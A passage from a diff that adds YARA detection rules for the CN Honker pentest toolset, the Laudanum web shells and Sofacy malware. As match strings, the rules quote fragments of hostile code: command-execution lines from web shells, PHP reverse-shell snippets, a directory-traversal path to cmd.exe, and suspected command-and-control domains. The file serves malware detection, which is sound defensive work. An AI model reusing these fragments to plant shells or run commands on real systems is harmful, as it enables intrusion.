+      $s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+      $s4 = "ScanInject.log" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+}
+
+rule CN_Honker_Pk_Pker_RID2D73 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file Pker.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 10:32:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe" fullword wide
+      $s2 = "msadc/..\\..\\..\\..\\winnt/system32/cmd.exe" fullword wide
+      $s3 = "--Made by VerKey&Only_Guest&Bincker" fullword wide
+      $s4 = ";APPLET;EMBED;FRAMESET;HEAD;NOFRAMES;NOSCRIPT;OBJECT;SCRIPT;STYLE;" fullword wide
+      $s5 = " --Welcome to Www.Pker.In Made by V.K" fullword wide
+      $s6 = "Report.dat" fullword wide
+      $s7 = ".\\Report.dat" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and 5 of them
+}
+
+rule CN_Honker_GetPass_GetPass_RID3094 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file GetPass.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:45:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\only\\Desktop\\" ascii
+      $s2 = "To Run As Administuor" ascii
+      $s3 = "Key to EXIT ... & pause > nul" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them
+}
+
+rule CN_Honker_F4ck_Team_F4ck_3_RID302E : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file F4ck_3.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:28:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "F4ck.exe" fullword wide
+      $s2 = "@Netapi32.dll" fullword ascii
+      $s3 = "Team.F4ck.Net" fullword wide
+      $s6 = "NO Net Add User" fullword wide
+      $s7 = "DLL ERROR" fullword ascii
+      $s11 = "F4ck Team" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 3 of them
+}
+
+rule CN_Honker_ACCESS_brute_RID2EFA : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file ACCESS_brute.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:37:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = ".dns166.co" ascii
+      $s2 = "SExecuteA" ascii
+      $s3 = "ality/clsCom" ascii
+      $s4 = "NT_SINK_AddRef" ascii
+      $s5 = "WINDOWS\\Syswm" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 20KB and all of them
+}
+
+rule CN_Honker_Fpipe_FPipe_RID2EEE : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file FPipe.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:35:31"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Unable to create TCP listen socket. %s%d" fullword ascii
+      $s2 = "http://www.foundstone.com" fullword ascii
+      $s3 = "%s %s port %d. Address is already in use" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 20KB and all of them
+}
+
+rule CN_Honker_Layer_Layer_RID2F20 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file Layer.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 11:43:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\Release\\Layer.pdb" ascii
+      $s2 = "Layer.exe" fullword wide
+      $s3 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them
+}
+
+rule CN_Honker_ms10048_x86_RID2DE9 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file ms10048-x86.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 10:52:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[+] Set to %d exploit half succeeded" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 30KB and all of them
+}
+
+rule CN_Honker_HTran2_4_RID2D69 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file HTran2.4.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 10:30:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Enter Your Socks Type No: [0.BindPort 1.ConnectBack 2.Listen]:" fullword ascii
+      $s2 = "[+] New connection %s:%d !!" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 180KB and all of them
+}
+
+rule CN_Honker_SkinHRootkit_SkinH_RID31CC : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file SkinH.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:37:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "(C)360.cn Inc.All Rights Reserved." fullword wide
+      $s1 = "SDVersion.dll" fullword wide
+      $s2 = "skinh.dll" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+}
+
+rule CN_Honker__PostgreSQL_mysql_injectV1_1_Creak_Oracle_SQLServer_inject_Creaked_RID442C : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - from files PostgreSQL.exe, mysql_injectV1.1_Creak.exe, Oracle.exe, SQLServer_inject_Creaked.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 02:41:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a1f066789f48a76023598c5777752c15f91b76b0"
+      hash2 = "0264f4efdba09eaf1e681220ba96de8498ab3580"
+      hash3 = "af3c41756ec8768483a4cf59b2e639994426e2c2"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "zhaoxypass@yahoo.com.cn" fullword ascii
+      $s2 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii
+      $s3 = "ProxyParams.ProxyPort" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and all of them
+}
+
+rule CN_Honker__wwwscan_wwwscan_wwwscan_gui_RID36A6 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - from files wwwscan.exe, wwwscan.exe, wwwscan_gui.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 17:04:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6bed45629c5e54986f2d27cbfc53464108911026"
+      hash2 = "897b66a34c58621190cb88e9b2a2a90bf9b71a53"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
+      $s2 = "<Usage>:  %s <HostName|Ip> [Options]" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them
+}
+
+rule CN_Honker__builder_shift_SkinH_RID32C6 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - from files builder.exe, shift.exe, SkinH.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 14:19:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ee127c1ea1e3b5bf3d2f8754fabf9d1101ed0ee0"
+      hash2 = "d593f03ae06e54b653c7850c872c0eed459b301f"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "lipboard" fullword ascii
+      $s2 = "uxthem" fullword ascii
+      $s3 = "ENIGMA" fullword ascii
+      $s4 = "UtilW0ndow" fullword ascii
+      $s5 = "prog3am" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 6075KB and all of them
+}
+
+rule CN_Honker__lcx_HTran2_4_htran20_RID324C : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - from files lcx.exe, HTran2.4.exe, htran20.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 13:59:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "524f986692f55620013ab5a06bf942382e64d38a"
+      hash2 = "b992bf5b04d362ed3757e90e57bc5d6b2a04e65c"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[SERVER]connection to %s:%d error" fullword ascii
+      $s2 = "[+] OK! I Closed The Two Socket." fullword ascii
+      $s3 = "[+] Start Transmit (%s:%d <-> %s:%d) ......" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 440KB and all of them
+}
+
+rule CN_Honker__D_injection_V2_32_D_injection_V2_32_D_injection_V2_32_RID3E17 : CHINA DEMO EXE FILE HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - from files D_injection_V2.32.exe, D_injection_V2.32.exe, D_injection_V2.32.exe"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 22:22:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3a000b976c79585f62f40f7999ef9bdd326a9513"
+      hash2 = "3a000b976c79585f62f40f7999ef9bdd326a9513"
+      tags = "CHINA, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "upfile.asp " fullword ascii
+      $s2 = "[wscript.shell]" fullword ascii
+      $s3 = "XP_CMDSHELL" fullword ascii
+      $s4 = "[XP_CMDSHELL]" fullword ascii
+      $s5 = "http://d99net.3322.org" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 10000KB and 4 of them
+}
+
+rule Webshell_XML_WEB_INF_web_RID2FAD : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Laudanum Injector Tools - file web.xml"
+      author = "Florian Roth"
+      reference = "http://laudanum.inguardians.com/"
+      date = "2015-06-22 12:07:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<servlet-name>Command</servlet-name>" fullword ascii
+      $s2 = "<jsp-file>/cmd.jsp</jsp-file>" fullword ascii
+   condition: 
+      filesize < 1KB and all of them
+}
+
+rule Webshell_asp_file_RID2DE9 : DEMO FILE T1100 WEBSHELL {
+   meta:
+      description = "Laudanum Injector Tools - file file.asp"
+      author = "Florian Roth"
+      reference = "http://laudanum.inguardians.com/"
+      date = "2015-06-22 10:52:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "' *** Written by Tim Medin <tim@counterhack.com>" fullword ascii
+      $s2 = "Response.BinaryWrite(stream.Read)" fullword ascii
+      $s3 = "Response.Write(Response.Status & Request.ServerVariables(\"REMOTE_ADDR\"))" fullword ascii
+      $s4 = "%><a href=\"<%=Request.ServerVariables(\"URL\")%>\">web root</a><br/><%" fullword ascii
+      $s5 = "set folder = fso.GetFolder(path)" fullword ascii
+      $s6 = "Set file = fso.GetFile(filepath)" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x253c and filesize < 30KB and 5 of them
+}
+
+rule Webshell_php_killnc_RID2ECA : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Laudanum Injector Tools - file killnc.php"
+      author = "Florian Roth"
+      reference = "http://laudanum.inguardians.com/"
+      date = "2015-06-22 11:29:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "if ($_SERVER[\"REMOTE_ADDR\"] == $IP)" fullword ascii
+      $s2 = "header(\"HTTP/1.0 404 Not Found\");" fullword ascii
+      $s3 = "<?php echo exec('killall nc');?>" fullword ascii
+      $s4 = "<title>Laudanum Kill nc</title>" fullword ascii
+      $s5 = "foreach ($allowedIPs as $IP) {" fullword ascii
+   condition: 
+      filesize < 15KB and 4 of them
+}
+
+rule Webshell_asp_shell_2_RID2EF2 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Laudanum Injector Tools - file shell.asp"
+      author = "Florian Roth"
+      reference = "http://laudanum.inguardians.com/"
+      date = "2015-06-22 11:36:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<form action=\"shell.asp\" method=\"POST\" name=\"shell\">" fullword ascii
+      $s2 = "%ComSpec% /c dir" fullword ascii
+      $s3 = "Set objCmd = wShell.Exec(cmd)" fullword ascii
+      $s4 = "Server.ScriptTimeout = 180" fullword ascii
+      $s5 = "cmd = Request.Form(\"cmd\")" fullword ascii
+      $s6 = "' ***  http://laudanum.secureideas.net" fullword ascii
+      $s7 = "Dim wshell, intReturn, strPResult" fullword ascii
+   condition: 
+      filesize < 15KB and 4 of them
+}
+
+rule Webshell_settings_PHP_RID2F5E : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Laudanum Injector Tools - file settings.php"
+      author = "Florian Roth"
+      reference = "http://laudanum.inguardians.com/"
+      date = "2015-06-22 11:54:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Port: <input name=\"port\" type=\"text\" value=\"8888\">" fullword ascii
+      $s2 = "<li>Reverse Shell - " fullword ascii
+      $s3 = "<li><a href=\"<?php echo plugins_url('file.php', __FILE__);?>\">File Browser</a>" ascii
+   condition: 
+      filesize < 13KB and all of them
+}
+
+rule Webshell_asp_proxy_RID2E8B : DEMO HKTL T1090 T1100 WEBSHELL {
+   meta:
+      description = "Laudanum Injector Tools - file proxy.asp"
+      author = "Florian Roth"
+      reference = "http://laudanum.inguardians.com/"
+      date = "2015-06-22 11:19:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL, T1090, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "'response.write \"<br/>  -value:\" & request.querystring(key)(j)" fullword ascii
+      $s2 = "q = q & \"&\" & key & \"=\" & request.querystring(key)(j)" fullword ascii
+      $s3 = "for each i in Split(http.getAllResponseHeaders, vbLf)" fullword ascii
+      $s4 = "'urlquery = mid(urltemp, instr(urltemp, \"?\") + 1)" fullword ascii
+      $s5 = "s = urlscheme & urlhost & urlport & urlpath" fullword ascii
+      $s6 = "Set http = Server.CreateObject(\"Microsoft.XMLHTTP\")" fullword ascii
+   condition: 
+      filesize < 50KB and all of them
+}
+
+rule Webshell_cfm_shell_RID2E53 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Laudanum Injector Tools - file shell.cfm"
+      author = "Florian Roth"
+      reference = "http://laudanum.inguardians.com/"
+      date = "2015-06-22 11:09:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Executable: <Input type=\"text\" name=\"cmd\" value=\"cmd.exe\"><br>" fullword ascii
+      $s2 = "<cfif ( #suppliedCode# neq secretCode )>" fullword ascii
+      $s3 = "<cfif IsDefined(\"form.cmd\")>" fullword ascii
+   condition: 
+      filesize < 20KB and 2 of them
+}
+
+rule Webshell_aspx_shell_RID2ED9 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Laudanum Injector Tools - file shell.aspx"
+      author = "Florian Roth"
+      reference = "http://laudanum.inguardians.com/"
+      date = "2015-06-22 11:32:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "remoteIp = HttpContext.Current.Request.Headers[\"X-Forwarded-For\"].Split(new" ascii
+      $s2 = "remoteIp = Request.UserHostAddress;" fullword ascii
+      $s3 = "<form method=\"post\" name=\"shell\">" fullword ascii
+      $s4 = "<body onload=\"document.shell.c.focus()\">" fullword ascii
+   condition: 
+      filesize < 20KB and all of them
+}
+
+rule Webshell_php_shell_RID2E65 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Laudanum Injector Tools - file shell.php"
+      author = "Florian Roth"
+      reference = "http://laudanum.inguardians.com/"
+      date = "2015-06-22 11:12:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "command_hist[current_line] = document.shell.command.value;" fullword ascii
+      $s2 = "if (e.keyCode == 38 && current_line < command_hist.length-1) {" fullword ascii
+      $s3 = "array_unshift($_SESSION['history'], $command);" fullword ascii
+      $s4 = "if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {" fullword ascii
+   condition: 
+      filesize < 40KB and all of them
+}
+
+rule Webshell_php_reverse_shell_RID31C0 : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Laudanum Injector Tools - file php-reverse-shell.php"
+      author = "Florian Roth"
+      reference = "http://laudanum.inguardians.com/"
+      date = "2015-06-22 13:35:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$process = proc_open($shell, $descriptorspec, $pipes);" fullword ascii
+      $s2 = "printit(\"Successfully opened reverse shell to $ip:$port\");" fullword ascii
+      $s3 = "$input = fread($pipes[1], $chunk_size);" fullword ascii
+   condition: 
+      filesize < 15KB and all of them
+}
+
+rule Webshell_php_dns_RID2D92 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Laudanum Injector Tools - file dns.php"
+      author = "Florian Roth"
+      reference = "http://laudanum.inguardians.com/"
+      date = "2015-06-22 10:37:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$query = isset($_POST['query']) ? $_POST['query'] : '';" fullword ascii
+      $s2 = "$result = dns_get_record($query, $types[$type], $authns, $addtl);" fullword ascii
+      $s3 = "if ($_SERVER[\"REMOTE_ADDR\"] == $IP)" fullword ascii
+      $s4 = "foreach (array_keys($types) as $t) {" fullword ascii
+   condition: 
+      filesize < 15KB and all of them
+}
+
+rule Webshell_jsp_cmd_2_RID2E17 : DEMO FILE T1100 WEBSHELL {
+   meta:
+      description = "Laudanum Injector Tools - file cmd.war"
+      author = "Florian Roth"
+      reference = "http://laudanum.inguardians.com/"
+      date = "2015-06-22 10:59:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "cmd.jsp}" fullword ascii
+      $s1 = "cmd.jspPK" fullword ascii
+      $s2 = "WEB-INF/web.xml" fullword ascii
+      $s3 = "WEB-INF/web.xmlPK" fullword ascii
+      $s4 = "META-INF/MANIFEST.MF" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x4b50 and filesize < 2KB and all of them
+}
+
+rule Webshell_laudanum_RID2DFD : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Laudanum Injector Tools - file laudanum.php"
+      author = "Florian Roth"
+      reference = "http://laudanum.inguardians.com/"
+      date = "2015-06-22 10:55:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "public function __activate()" fullword ascii
+      $s2 = "register_activation_hook(__FILE__, array('WP_Laudanum', 'activate'));" fullword ascii
+   condition: 
+      filesize < 5KB and all of them
+}
+
+rule Webshell_php_file_RID2DED : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Laudanum Injector Tools - file file.php"
+      author = "Florian Roth"
+      reference = "http://laudanum.inguardians.com/"
+      date = "2015-06-22 10:52:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$allowedIPs =" fullword ascii
+      $s2 = "<a href=\"<?php echo $_SERVER['PHP_SELF']  ?>\">Home</a><br/>" fullword ascii
+      $s3 = "$dir  = isset($_GET[\"dir\"])  ? $_GET[\"dir\"]  : \".\";" fullword ascii
+      $s4 = "$curdir .= substr($curdir, -1) != \"/\" ? \"/\" : \"\";" fullword ascii
+   condition: 
+      filesize < 10KB and all of them
+}
+
+rule Webshell_warfiles_cmd_RID2F96 : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Laudanum Injector Tools - file cmd.jsp"
+      author = "Florian Roth"
+      reference = "http://laudanum.inguardians.com/"
+      date = "2015-06-22 12:03:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));" fullword ascii
+      $s2 = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" fullword ascii
+      $s3 = "<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">" fullword ascii
+      $s4 = "String disr = dis.readLine();" fullword ascii
+   condition: 
+      filesize < 2KB and all of them
+}
+
+rule Webshell_asp_dns_RID2D8E : DEMO T1100 WEBSHELL {
+   meta:
+      description = "Laudanum Injector Tools - file dns.asp"
+      author = "Florian Roth"
+      reference = "http://laudanum.inguardians.com/"
+      date = "2015-06-22 10:36:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "command = \"nslookup -type=\" & qtype & \" \" & query " fullword ascii
+      $s2 = "Set objCmd = objWShell.Exec(command)" fullword ascii
+      $s3 = "Response.Write command & \"<br>\"" fullword ascii
+      $s4 = "<form name=\"dns\" method=\"POST\">" fullword ascii
+   condition: 
+      filesize < 21KB and all of them
+}
+
+rule php_reverse_shell_2_RID2EBC : DEMO SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Laudanum Injector Tools - file php-reverse-shell.php"
+      author = "Florian Roth"
+      reference = "http://laudanum.inguardians.com/"
+      date = "2015-06-22 11:27:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$process = proc_open($shell, $descriptorspec, $pipes);" fullword ascii
+      $s7 = "$shell = 'uname -a; w; id; /bin/sh -i';" fullword ascii
+   condition: 
+      filesize < 10KB and all of them
+}
+
+rule Webshell_Laudanum_Tools_Generic_RID3369 : DEMO GEN T1100 WEBSHELL {
+   meta:
+      description = "Laudanum Injector Tools"
+      author = "Florian Roth"
+      reference = "http://laudanum.inguardians.com/"
+      date = "2015-06-22 14:46:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "885e1783b07c73e7d47d3283be303c9719419b92"
+      hash2 = "01d5d16d876c55d77e094ce2b9c237de43b21a16"
+      hash3 = "7421d33e8007c92c8642a36cba7351c7f95a4335"
+      tags = "DEMO, GEN, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "***  laudanum@secureideas.net" fullword ascii
+      $s2 = "*** Laudanum Project" fullword ascii
+   condition: 
+      filesize < 60KB and all of them
+}
+
+rule Sofacy_Mal2_RID2B21 : APT DEMO EXE FILE G0007 MAL RUSSIA {
+   meta:
+      description = "Sofacy Group Malware Sample 2"
+      author = "Florian Roth"
+      reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
+      date = "2015-06-19 08:53:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, G0007, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "PROJECT\\XAPS_OBJECTIVE_DLL\\" ascii
+      $x2 = "XAPS_OBJECTIVE.dll" fullword ascii
+      $s1 = "i`m wait" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and ( 1 of ( $x* ) ) and $s1
+}
+
+rule Sofacy_Mal3_RID2B22 : APT DEMO EXE FILE G0007 MAL RUSSIA {
+   meta:
+      description = "Sofacy Group Malware Sample 3"
+      author = "Florian Roth"
+      reference = "http://dokumente.linksfraktion.de/inhalt/report-orig.pdf"
+      date = "2015-06-19 08:53:31"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      tags = "APT, DEMO, EXE, FILE, G0007, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "shell\\open\\command=\"System Volume Information\\USBGuard.exe\" install" fullword ascii
+      $s2 = ".?AVAgentModuleRemoteKeyLogger@@" fullword ascii
+      $s3 = "<font size=4 color=red>process isn't exist</font>" fullword ascii
+      $s4 = "<font size=4 color=red>process is exist</font>" fullword ascii
+      $s5 = ".winnt.check-fix.com" ascii
+      $s6 = ".update.adobeincorp.com" ascii
+      $s7 = ".microsoft.checkwinframe.com" ascii
+      $s8 = "adobeincorp.com" fullword wide
